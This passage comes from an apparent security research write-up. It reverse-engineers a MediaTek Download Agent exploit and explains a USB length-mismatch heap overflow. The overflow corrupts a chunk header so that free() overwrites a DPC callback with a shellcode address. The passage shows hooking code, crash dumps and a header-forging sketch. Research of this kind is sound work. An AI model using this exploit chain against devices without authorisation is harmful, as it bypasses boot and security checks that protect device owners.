&lt;p&gt;On older devices, you could use Carbonara to get arbitrary read/write in DA1. But our target&apos;s DA1 was already patched against Carbonara, so that wasn&apos;t an option.&lt;/p&gt;
&lt;h3&gt;A Crazy Idea&lt;/h3&gt;
&lt;p&gt;Then I remembered a project I&apos;d released the previous year: &lt;a href=&quot;https://github.com/R0rt1z2/fenrir&quot;&gt;fenrir&lt;/a&gt;. To understand what it does, you need to know how MediaTek&apos;s boot chain works:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/bootchain-dark.png&quot; alt=&quot;MediaTek boot chain&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The LK partition actually contains an image with multiple sub-partitions inside:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The important thing is that Preloader loads and jumps to &lt;code&gt;bl2_ext&lt;/code&gt; while still running at EL3 (the highest ARM privilege level), expecting it to drop privileges and continue the boot chain. From there, &lt;code&gt;bl2_ext&lt;/code&gt; verifies and loads everything that comes after it.&lt;/p&gt;
&lt;p&gt;fenrir exploits a logic flaw where &lt;code&gt;bl2_ext&lt;/code&gt; isn&apos;t properly verified when seccfg is unlocked. By patching the original &lt;code&gt;bl2_ext&lt;/code&gt; to skip verification of the sub-partitions that follow it, you can boot unsigned or patched LK sub-partitions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[PART] img_auth_required = 0
[PART] Image with header, name: bl2_ext, addr: FFFFFFFFh, mode: FFFFFFFFh, size:654944, magic:58881688h
[PART] part: lk_a img: bl2_ext cert vfy(0 ms)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But for this research, we needed something more powerful. We didn&apos;t just want to skip verification; we wanted to patch Preloader&apos;s memory directly and re-execute certain routines, like the handshake handler.&lt;/p&gt;
&lt;p&gt;So I wrote &lt;a href=&quot;https://github.com/R0rt1z2/sprig&quot;&gt;sprig&lt;/a&gt;, a complete replacement for &lt;code&gt;bl2_ext&lt;/code&gt;. Instead of patching the original, this payload takes its place entirely.&lt;/p&gt;
&lt;p&gt;Preloader loads it expecting the real &lt;code&gt;bl2_ext&lt;/code&gt;, but instead of continuing the boot chain, sprig keeps running at EL3 in the same context as Preloader itself.&lt;/p&gt;
&lt;p&gt;The initial version was simple: disable SBC, SLA, and DAA checks, then jump back to Preloader&apos;s handshake handler.&lt;/p&gt;
&lt;p&gt;This let us load unmodified DAs through &lt;a href=&quot;https://github.com/shomykohai/penumbra&quot;&gt;penumbra&lt;/a&gt;, upload a test file using the AIO command, and then dump the heap to see exactly where our data ended up.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/dumping-heap.png&quot; alt=&quot;Dumping heap with penumbra&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;With the heap dumped, the next step was to find where the AIO signature data landed and start mapping out the heap layout.&lt;/p&gt;
&lt;p&gt;I fired up a hex editor and searched for &lt;code&gt;AAAAAAAAAAAAAAAA...&lt;/code&gt;, which is what our test payload consisted of.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/heap-dump-analysis.png&quot; alt=&quot;Heap dump with AIO signature&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;...and there it was! By analyzing the header, we can see this chunk is allocated (&lt;code&gt;size = 0x200018&lt;/code&gt;) and sits at &lt;code&gt;0x40308BF8&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Since the allocation size affects where a chunk lands, we repeated the upload with the same file Chimera sends as the first AIO signature. This time it landed at &lt;code&gt;0x40308C18&lt;/code&gt; with a size of &lt;code&gt;0x1E0230&lt;/code&gt; bytes.&lt;/p&gt;
&lt;h2&gt;Dynamic Heap Analysis&lt;/h2&gt;
&lt;p&gt;Now we knew where our data landed, but we needed more: what&apos;s around it, how the heap evolves during the exploit, and ideally, real-time dumps as things happen.&lt;/p&gt;
&lt;p&gt;Since we had no control over what Chimera sends, we needed to be there before Chimera feeds the device with its DAs and commands.&lt;/p&gt;
&lt;h3&gt;Extending sprig&lt;/h3&gt;
&lt;p&gt;Everything flows through Preloader first. DA1 gets downloaded and verified by Preloader, then DA1 downloads and verifies DA2. If we could hook each stage as it loads, we could patch anything we wanted.&lt;/p&gt;
&lt;p&gt;So I extended sprig to install hooks at multiple points in the boot chain:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Preloader hook&lt;/strong&gt;: Right after Preloader receives and verifies DA1, but before jumping to it. This lets us patch DA1 in memory.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;DA1 hook&lt;/strong&gt;: Right after DA1 receives and verifies DA2, but before jumping to it. This lets us patch DA2 in memory.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For DA1, the first thing I did was force the log level to &lt;code&gt;DEBUG&lt;/code&gt; regardless of what the host requests:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void da1_init_hook(void) {
    printf(&quot;DA1 init hook\n&quot;);

    /* force log level to DEBUG */
    writel(0x52800028, 0x40200EC4);
    flush_dcache_range(0x40200EC4, 4);
    invalidate_icache();

    hook_install(&amp;amp;(hook_t)HOOK(0x40200B50, 0x402010AC, da2_init_hook, &quot;da2_init&quot;));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This simple patch meant we&apos;d get full UART output from both DAs, regardless of Chimera trying to silence them with &lt;code&gt;da_log_level=ERROR&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Hooking DA2&lt;/h3&gt;
&lt;p&gt;Once DA2 loads, the real fun begins. Based on what we&apos;d seen in the USB capture, we knew the exploit involved heap allocations, XML parsing, and some kind of error condition.&lt;/p&gt;
&lt;p&gt;So I installed hooks on the functions that seemed most relevant:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void da2_init_hook(void) {
    printf(&quot;DA2 init hook\n&quot;);

    hook_install(&amp;amp;(hook_t)HOOK(0x4000749C, 0x400066AC, free_on_abort_hook, &quot;free_on_abort&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002AAB0, 0x4000687C, malloc_for_file_hook, &quot;malloc_for_file&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002A9F0, 0x400067BC, error_path_hook, &quot;error_path_1&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002AA88, 0x400068CC, error_path_hook, &quot;error_path_2&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4000FBE0, 0x4000693C, mxml_free_hook, &quot;mxml_free&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4000fcac, 0x40006E1C, mxml_inner_free_hook, &quot;mxml_inner_free&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002A554, 0x40006B9C, mxml_escape_malloc_hook, &quot;mxml_escape_malloc&quot;));
    hook_install(&amp;amp;(hook_t)HOOK(0x4002A8F4, 0x40006D6C, mxml_escape_hook, &quot;mxml_escape&quot;));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;malloc_for_file_hook&lt;/code&gt;: Tracks where &lt;code&gt;fp_read_host_file&lt;/code&gt; allocates buffers for incoming data&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_escape_malloc_hook&lt;/code&gt;: Tracks the 0x200-byte buffer allocation in &lt;code&gt;mxml_escape&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_escape_hook&lt;/code&gt;: Dumps the escaped output to see if/how it overflows&lt;/li&gt;
&lt;li&gt;&lt;code&gt;error_path_hook&lt;/code&gt;: Catches when &lt;code&gt;fp_read_host_file&lt;/code&gt; hits an error&lt;/li&gt;
&lt;li&gt;&lt;code&gt;free_on_abort_hook&lt;/code&gt;: Monitors what gets freed during error handling&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_free_hook&lt;/code&gt;: Tracks when the XML tree gets cleaned up&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mxml_inner_free_hook&lt;/code&gt;: Tracks the individual &lt;code&gt;free()&lt;/code&gt; calls inside &lt;code&gt;mxml_free&lt;/code&gt; for node data&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each hook logs its arguments, dumps relevant memory regions, and traces the heap state.&lt;/p&gt;
&lt;h2&gt;Heap Layout&lt;/h2&gt;
&lt;p&gt;With the previous hooks in place, we ran Chimera again and watched the UART output. The heap layout became clear:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/heap-layout.png&quot; alt=&quot;Heap layout during exploit&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;When the second AIO command arrives, Chimera sends it with a huge filename full of special characters. This does two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Heap shaping&lt;/strong&gt;: &lt;code&gt;mxmlLoadString&lt;/code&gt; allocates a buffer for the filename string, which ends up right after the AIO2 data buffer due to the allocation size.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;XML expansion overflow&lt;/strong&gt;: When &lt;code&gt;mxml_escape&lt;/code&gt; processes the special characters, it expands them (&lt;code&gt;&amp;amp;&lt;/code&gt; → &lt;code&gt;&amp;amp;amp;&lt;/code&gt;, etc.) and overflows into the AIO1 shellcode buffer.&lt;/li&gt;
&lt;/ol&gt;
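&lt;p&gt;To get a feel for how quickly the expansion grows, here&apos;s a rough sketch that only computes lengths. The entity set (amp, lt, gt, quot) is an assumption on our side, and the function names are made up for this example; the DA&apos;s &lt;code&gt;mxml_escape&lt;/code&gt; may handle more or fewer characters:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stddef.h&amp;gt;

/* Length of one character after XML entity escaping (assumed entity set). */
size_t escaped_char_len(char c)
{
    switch (c) {
    case &apos;&amp;amp;&apos;: return 5; /* amp entity  */
    case &apos;&amp;lt;&apos;: return 4; /* lt entity   */
    case &apos;&amp;gt;&apos;: return 4; /* gt entity   */
    case &apos;&quot;&apos;: return 6; /* quot entity */
    default:  return 1; /* copied as-is */
    }
}

/* Total escaped length of a NUL-terminated string. */
size_t escaped_len(const char *s)
{
    size_t n = 0;
    while (*s)
        n += escaped_char_len(*s++);
    return n;
}

/* Bytes that would land past a destination buffer of `cap` bytes (0 if it fits). */
size_t escape_overflow(const char *s, size_t cap)
{
    size_t n = escaped_len(s);
    return n &amp;gt; cap ? n - cap : 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With these numbers, a filename of just 103 ampersands already expands to 515 bytes, which no longer fits in a 0x200-byte buffer.&lt;/p&gt;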
&lt;h2&gt;A Dead End: The XML Overflow&lt;/h2&gt;
&lt;p&gt;We initially thought the XML expansion was the exploit. After all, it&apos;s still a heap overflow, 172 bytes past the end of the buffer.&lt;/p&gt;
&lt;p&gt;As described above, when the second AIO command arrives, &lt;code&gt;mxml_escape&lt;/code&gt; expands the long filename full of special characters. The expanded output runs past the end of the 0x200-byte buffer and corrupts AIO signature buffer 1, which sits right after it.&lt;/p&gt;
&lt;p&gt;Remember what happens in &lt;code&gt;set_all_in_one_signature_buffer&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (_g_ext_all_in_one_sig != (uint8_t *)0x0) {
    free(_g_ext_all_in_one_sig);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If a previous AIO signature exists, it gets freed before storing the new one. So when the second AIO command completes successfully, the corrupted AIO buffer 1 gets freed.&lt;/p&gt;
&lt;p&gt;We tried to replicate this ourselves: send the first AIO, then send the second AIO with the malicious filename, but without aborting like Chimera does. The result was a crash:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;data fault: PC at 0x40009ec4, FAR 0x6d61263b3b3b747c, iss 0x61
ESR 0x96000061: ec 0x25, il 0x2000000, iss 0x61
iframe 0x402836d0:
x0  0x6d61263b3b3b746c x1  0x              3a x2  0x        40075820 x3  0x        40075840
x4  0x        40043d6f x5  0x        400441e7 x6  0x              58 x7  0x              78
x8  0x6d61263b3b3b746c x9  0x3b3b3b3b3b3b3b70 x10 0x             657 x11 0x             654
x12 0x        31bb1508 x13 0x        40070160 x14 0x              68 x15 0x        40282fbf
x16 0xfffffffffffffe02 x17 0x        400441a6 x18 0x               d x19 0x              3a
x20 0x        403084e0 x21 0x        40076000 x22 0x        40070000 x23 0x        40287e40
x24 0x        40070000 x25 0x        40008db8 x26 0x        40055000 x27 0x        40070000
x28 0x               0 x29 0x        402837e0 lr  0x        4002ccbc usp 0x99b04a2404743432
elr 0x        40009ec4
spsr 0x        6200038d
#die sync exception.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Looking at the decompiled DA2, the crash happens in &lt;code&gt;free()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;free:
    40009eb8  cbz   ptr, LAB_40009ecc
    40009ebc  ldp   x8, x9, [ptr, #-0x10]   ; load chunk header
    40009ec0  mov   ptr, x8
    40009ec4  str   x9, [x8, #0x10]         ; CRASH HERE
&lt;/code&gt;&lt;/pre&gt;
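&lt;p&gt;The &lt;code&gt;FAR&lt;/code&gt; shows &lt;code&gt;0x6d61263b3b3b747c&lt;/code&gt;, which is &lt;code&gt;x8 + 0x10&lt;/code&gt;, the address the &lt;code&gt;str&lt;/code&gt; tried to write to. Read byte by byte, that&apos;s ASCII for &lt;code&gt;ma&amp;amp;;;;t|&lt;/code&gt;: corrupted data from the XML expansion overwriting the chunk header.&lt;/p&gt;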
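&lt;p&gt;The same check can be done mechanically. Here&apos;s a small sketch (the helper name is ours) that renders a 64-bit register value as the bytes it had in memory; the DA runs little-endian, so the least significant byte comes first:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdint.h&amp;gt;

/* Write the 8 bytes of `v` into `out` in little-endian (memory) order,
 * followed by a NUL, so the value can be printed as a string. */
void u64_to_ascii_le(uint64_t v, char out[9])
{
    for (int i = 0; i &amp;lt; 8; i++)
        out[i] = (char)((v &amp;gt;&amp;gt; (8 * i)) &amp;amp; 0xFF);
    out[8] = &apos;\0&apos;;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Fed with &lt;code&gt;x8&lt;/code&gt; from the dump (&lt;code&gt;0x6d61263b3b3b746c&lt;/code&gt;, i.e. the &lt;code&gt;FAR&lt;/code&gt; minus &lt;code&gt;0x10&lt;/code&gt;), this produces &lt;code&gt;lt;;;&amp;amp;am&lt;/code&gt;, which looks like the tail of an &lt;code&gt;&amp;amp;lt;&lt;/code&gt; entity followed by the start of an &lt;code&gt;&amp;amp;amp;&lt;/code&gt;.&lt;/p&gt;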
&lt;p&gt;At first, this seemed promising: if we could control the chunk metadata with the overflow, maybe we could turn this into an arbitrary write during &lt;code&gt;free()&lt;/code&gt;.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/xml-meme.jpg&quot; alt=&quot;XML meme&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;But there&apos;s a problem: we can&apos;t send arbitrary bytes in the XML filename. Special characters get entity-encoded (&lt;code&gt;&amp;amp;&lt;/code&gt; becomes &lt;code&gt;&amp;amp;amp;&lt;/code&gt;, etc.), and null bytes get rejected by the XML parser entirely.&lt;/p&gt;
&lt;p&gt;To craft a fake chunk header, we&apos;d need to overwrite &lt;code&gt;ptr&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; in the &lt;code&gt;alloc_struct_begin&lt;/code&gt; with controlled values.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/xml-overflow.png&quot; width=&quot;70%&quot; alt=&quot;XML overflow chunk header&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;For example, to fake a pointer like &lt;code&gt;0x40070028&lt;/code&gt;, we&apos;d need to send bytes &lt;code&gt;28 00 07 40 00 00 00 00&lt;/code&gt;, but those null bytes are impossible to include in an XML string.&lt;/p&gt;
&lt;p&gt;After countless hours of brainstorming, experimenting with different character combinations, and desperately searching for some way to sneak controlled bytes through the XML parser, we finally admitted defeat. The XML overflow, despite its impressive size, simply wasn&apos;t exploitable.&lt;/p&gt;
&lt;p&gt;Which meant Chimera had to be doing something else entirely. The XML expansion overflow was a red herring, likely included to confuse people like us :P.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(and it actually did, we wasted way more time than we&apos;d like to admit trying to make something useful out of it).&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;The Real Exploit: USB Overflow&lt;/h2&gt;
&lt;p&gt;Going back to the USB capture, we focused on why Chimera was aborting the second AIO command instead of completing it normally.&lt;/p&gt;
&lt;p&gt;Looking more closely, we noticed something odd about how Chimera sends the second AIO file.&lt;/p&gt;
&lt;p&gt;According to the V6 protocol, before sending file data, the host advertises how many bytes the DA should expect. Looking at the capture:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;4F 4B 40 35 31 31 36 20  -&amp;gt;  &quot;OK@5116&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So they tell the DA they&apos;ll send &lt;code&gt;0x13FC&lt;/code&gt; bytes (5116 in decimal). But the actual payload size was &lt;code&gt;0x2410&lt;/code&gt; bytes, nearly twice as much.&lt;/p&gt;
&lt;p&gt;We went back to &lt;code&gt;fp_read_host_file&lt;/code&gt; and looked at the download loop more carefully:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;advertised_size = atoll(vec[1]); // size from host (0x13fc)

*out_data_len = (uint)advertised_size;
buffer = (char *)malloc(advertised_size + 4); // allocate with 4-byte overhead
*out_data = buffer;

(*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);

if (advertised_size != 0) {
    bytes_received = 0;
    do {
        // ... read OK from host ...
        (*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);
        chunk_len = packet_size; // 0x20000 bytes max per USB packet
        status = (*channel-&amp;gt;read)((uint8_t *)(buffer + bytes_received), &amp;amp;chunk_len);
        if (status != 0) goto usb_error;
        bytes_received = bytes_received + chunk_len;
        (*channel-&amp;gt;write)((uint8_t *)&quot;OK&quot;, 3);
    } while (bytes_received != advertised_size);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The DA allocates a buffer based on &lt;code&gt;advertised_size&lt;/code&gt; plus a 4-byte overhead (probably for a null terminator or length field), but the read loop uses &lt;code&gt;packet_size&lt;/code&gt; (&lt;code&gt;0x20000&lt;/code&gt;) for each chunk, not the remaining bytes.&lt;/p&gt;
&lt;p&gt;The loop only terminates when &lt;code&gt;bytes_received == advertised_size&lt;/code&gt;, so if the host advertises a small size but sends more data than that, the DA will happily write past the end of the allocated buffer.&lt;/p&gt;
&lt;p&gt;In Chimera&apos;s case:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Host advertises &lt;code&gt;0x13FC&lt;/code&gt; bytes&lt;/li&gt;
&lt;li&gt;DA allocates &lt;code&gt;0x1400&lt;/code&gt; bytes (&lt;code&gt;0x13FC + 4&lt;/code&gt; overhead)&lt;/li&gt;
&lt;li&gt;Host actually sends &lt;code&gt;0x1410&lt;/code&gt; bytes&lt;/li&gt;
&lt;li&gt;The DA reads the full chunk, overflowing by &lt;code&gt;0x10&lt;/code&gt; bytes into the next chunk&apos;s header&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;And since we&apos;re sending raw USB data (not XML-encoded strings), we have full control over every byte, including null bytes!&lt;/p&gt;
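&lt;p&gt;The size mismatch from the list above can be modelled in a few lines. This is only a sketch under two assumptions: the host sends everything in a single transfer, and &lt;code&gt;channel-&amp;gt;read&lt;/code&gt; copies whatever arrives up to the length it was given. The function names are hypothetical:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stddef.h&amp;gt;

/* Model of a single channel-&amp;gt;read() in the vulnerable loop.
 * The DA passes packet_size as the maximum length, so up to that many
 * bytes are copied no matter how small the buffer is.
 * Returns how many bytes end up past the (advertised + 4)-byte buffer. */
size_t overflow_bytes(size_t advertised, size_t sent, size_t packet_size)
{
    size_t capacity = advertised + 4; /* malloc(advertised_size + 4) */
    size_t copied = sent &amp;lt; packet_size ? sent : packet_size;

    return copied &amp;gt; capacity ? copied - capacity : 0;
}

/* The loop exits only on exact equality, so an overshoot never satisfies it. */
int loop_would_exit(size_t bytes_received, size_t advertised)
{
    return bytes_received == advertised;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;overflow_bytes(0x13FC, 0x1410, 0x20000)&lt;/code&gt; comes out as &lt;code&gt;0x10&lt;/code&gt;, and &lt;code&gt;loop_would_exit(0x1410, 0x13FC)&lt;/code&gt; is false. Our reading is that this is why the command has to be aborted rather than completed, since the loop would otherwise keep waiting for data.&lt;/p&gt;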
&lt;h2&gt;The Write Primitive&lt;/h2&gt;
&lt;p&gt;On ARM64, the allocated chunk header looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+0x00: ptr   (8 bytes) - pointer to chunk start
+0x08: size  (8 bytes) - allocation size
+0x10: data  (user data starts here)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When &lt;code&gt;free()&lt;/code&gt; is called on a chunk, it does:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;free:
    cbz    ptr, return           ; if (ptr == NULL) return
    ldp    x8, x9, [ptr, #-0x10] ; x8 = alloc.ptr, x9 = alloc.size
    mov    ptr, x8               ; chunk = alloc.ptr
    str    x9, [x8, #0x10]       ; chunk-&amp;gt;len = alloc.size  &amp;lt;-- the write
    b      heap_insert_free_chunk
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What matters here is &lt;code&gt;str x9, [x8, #0x10]&lt;/code&gt;. It writes &lt;code&gt;alloc.size&lt;/code&gt; to &lt;code&gt;alloc.ptr + 0x10&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If we can control both &lt;code&gt;ptr&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; in the chunk header through our overflow, we get an arbitrary write primitive: &lt;strong&gt;write &lt;code&gt;size&lt;/code&gt; to &lt;code&gt;ptr + 0x10&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Targeting DPC&lt;/h3&gt;
&lt;p&gt;Now we need a target for our write. We need a function pointer at a known address that gets called regularly.&lt;/p&gt;
&lt;p&gt;Looking at the DA2 command loop, we found exactly that: the &lt;strong&gt;DPC (Deferred Procedure Call)&lt;/strong&gt; structure. At the end of each command iteration, the DA checks if there&apos;s a pending callback:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (get_cmd_dpc()-&amp;gt;cb != 0) {
    LOGD(&quot;\n@Protocol: DPC CALL\n&quot;);
    get_cmd_dpc()-&amp;gt;cb(get_cmd_dpc()-&amp;gt;arg);
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The DPC structure is simple:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct cmd_dpc_t {
    const char *key;
    cmd_dpc_cb cb;   // &amp;lt;- function pointer
    void *arg;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It&apos;s used by commands that need to do something &lt;em&gt;after&lt;/em&gt; the command response is sent, like rebooting or switching USB speed. The structure lives at a fixed address in &lt;code&gt;.bss&lt;/code&gt;, and &lt;code&gt;cb&lt;/code&gt; gets called if it&apos;s non-null.&lt;/p&gt;
&lt;p&gt;Perfect target. If we overwrite &lt;code&gt;cb&lt;/code&gt; with our shellcode address, the DA will call it for us at the end of the command loop.&lt;/p&gt;
&lt;p&gt;On our device, the DPC structure lives at:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0x40070030: key
0x40070038: cb    &amp;lt;- function pointer we want to overwrite
0x40070040: arg
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Our overflow writes into the XML filename buffer&apos;s header:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0x4530bda8: ptr  = 0x40070028     (0x10 bytes before dpc-&amp;gt;cb)
0x4530bdb0: size = shellcode_addr
0x4530bdb8: data = &quot;file_name...&quot; (the huge filename)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When the command is aborted, &lt;code&gt;mxmlDelete&lt;/code&gt; cleans up the XML tree and calls &lt;code&gt;free()&lt;/code&gt; on the filename buffer. The corrupted header causes &lt;code&gt;free()&lt;/code&gt; to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Read &lt;code&gt;ptr = 0x40070028&lt;/code&gt; and &lt;code&gt;size = shellcode_addr&lt;/code&gt; from the header&lt;/li&gt;
&lt;li&gt;Execute &lt;code&gt;str x9, [x8, #0x10]&lt;/code&gt; -&amp;gt; writes &lt;code&gt;shellcode_addr&lt;/code&gt; to &lt;code&gt;0x40070028 + 0x10 = 0x40070038&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x40070038&lt;/code&gt; is &lt;code&gt;dpc-&amp;gt;cb&lt;/code&gt; -&amp;gt; &lt;strong&gt;shellcode address written!&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;After the command ends, the DA&apos;s main loop checks &lt;code&gt;dpc-&amp;gt;cb&lt;/code&gt;, sees it&apos;s non-null, and calls it, jumping straight into our shellcode.&lt;/p&gt;
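&lt;p&gt;The header we smuggle in through the overflow is just 16 bytes. A minimal sketch of how it could be built, assuming the 64-bit layout shown above; &lt;code&gt;forge_header&lt;/code&gt; and &lt;code&gt;struct cmd_dpc&lt;/code&gt; are names made up for this example, not penumbra&apos;s actual code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stddef.h&amp;gt;

/* Layout of the DPC structure from above, with explicit 64-bit fields. */
struct cmd_dpc {
    uint64_t key;
    uint64_t cb;   /* function pointer we want to overwrite */
    uint64_t arg;
};

/* Build the 16 bytes that replace the victim chunk&apos;s header.
 * free() stores `size` at `ptr + 0x10`, so ptr = target - 0x10. */
void forge_header(uint64_t dpc_base, uint64_t shellcode_addr, uint8_t out[16])
{
    uint64_t target = dpc_base + offsetof(struct cmd_dpc, cb);
    uint64_t fields[2] = { target - 0x10, shellcode_addr };

    for (int f = 0; f &amp;lt; 2; f++)
        for (int i = 0; i &amp;lt; 8; i++)
            out[f * 8 + i] = (uint8_t)(fields[f] &amp;gt;&amp;gt; (8 * i)); /* little-endian */
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With &lt;code&gt;dpc_base = 0x40070030&lt;/code&gt;, the first eight bytes come out as &lt;code&gt;28 00 07 40 00 00 00 00&lt;/code&gt;, exactly the sequence the XML path could never deliver.&lt;/p&gt;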
&lt;h1&gt;Putting It All Together&lt;/h1&gt;
&lt;p&gt;So, to recap the full exploit chain:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Send a first AIO command with our shellcode payload&lt;/li&gt;
&lt;li&gt;Send a second AIO command with a crafted filename that shapes the heap&lt;/li&gt;
&lt;li&gt;Advertise a smaller size than we actually send, overflowing into the XML filename buffer&apos;s header&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;ptr&lt;/code&gt; to 0x10 bytes before &lt;code&gt;dpc-&amp;gt;cb&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; to our shellcode address&lt;/li&gt;
&lt;li&gt;Abort the command, triggering &lt;code&gt;mxmlDelete&lt;/code&gt; -&amp;gt; &lt;code&gt;free()&lt;/code&gt; -&amp;gt; arbitrary write&lt;/li&gt;
&lt;li&gt;DPC callback gets overwritten, shellcode executes on next command loop iteration&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We called it &lt;strong&gt;heapb8&lt;/strong&gt; (heapbait), because after getting baited by Chimera&apos;s XML overflow decoy, the name just felt right :).&lt;/p&gt;
&lt;p&gt;The next step was to make the exploit generic across devices and integrate it into &lt;a href=&quot;https://github.com/shomykohai/penumbra&quot;&gt;penumbra&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Predicting the Heap Layout&lt;/h2&gt;
&lt;p&gt;While reimplementing the exploit, we realized the original approach was unnecessarily complicated.&lt;/p&gt;
&lt;p&gt;There are two separate allocations involving the filename:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;mxml_escape&lt;/code&gt; buffer (0x200 bytes, static)&lt;/strong&gt;: Allocated once and reused. The XML expansion overflows this buffer, but since it&apos;s static, it doesn&apos;t affect heap layout at all.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;XML filename node buffer (dynamic)&lt;/strong&gt;: When &lt;code&gt;mxmlLoadString&lt;/code&gt; parses the command, it allocates storage for the filename string. This allocation depends on the filename length &lt;em&gt;before&lt;/em&gt; escaping, and this is what actually shapes the heap.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The original exploit used a filename stuffed with special characters, presumably to trigger the XML expansion.&lt;/p&gt;
&lt;p&gt;But that expansion only affects the static &lt;code&gt;mxml_escape&lt;/code&gt; buffer; it has nothing to do with where the filename node ends up on the heap.&lt;/p&gt;
